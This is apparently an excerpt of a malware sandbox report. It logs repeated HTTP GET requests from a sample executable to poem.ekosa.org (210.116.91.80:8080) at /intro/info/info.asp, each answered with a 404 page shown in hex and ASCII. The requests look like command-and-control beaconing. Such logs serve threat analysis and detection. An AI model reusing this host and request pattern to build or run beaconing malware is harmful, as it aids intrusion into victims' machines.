      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      233192.168.2.450013210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:12.353857994 CET5276OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:12.612499952 CET5277INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:11 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      234192.168.2.450014210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:12.996682882 CET5278OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:13.265201092 CET5278INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      235192.168.2.450015210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:13.529620886 CET5279OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:13.786463976 CET5280INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      236192.168.2.450016210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:14.060118914 CET5280OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:14.321432114 CET5281INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:14 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      237192.168.2.450017210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:14.707397938 CET5282OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:14.968189955 CET5282INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:14 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      238192.168.2.450018210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:15.236136913 CET5283OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:15.496850967 CET5283INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      239192.168.2.450019210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:15.794238091 CET5284OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:16.056045055 CET5285INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:15 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      24192.168.2.449788210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:10.567939997 CET394OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:10.835975885 CET395INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      240192.168.2.450020210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:16.427335978 CET5286OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:16.689208031 CET5287INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      241192.168.2.450021210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:16.966995001 CET5288OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:17.228844881 CET5289INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:16 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      242192.168.2.450022210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:17.506401062 CET5289OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:17.776748896 CET5290INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:17 GMT
      Connection: close
      Content-Length: 315
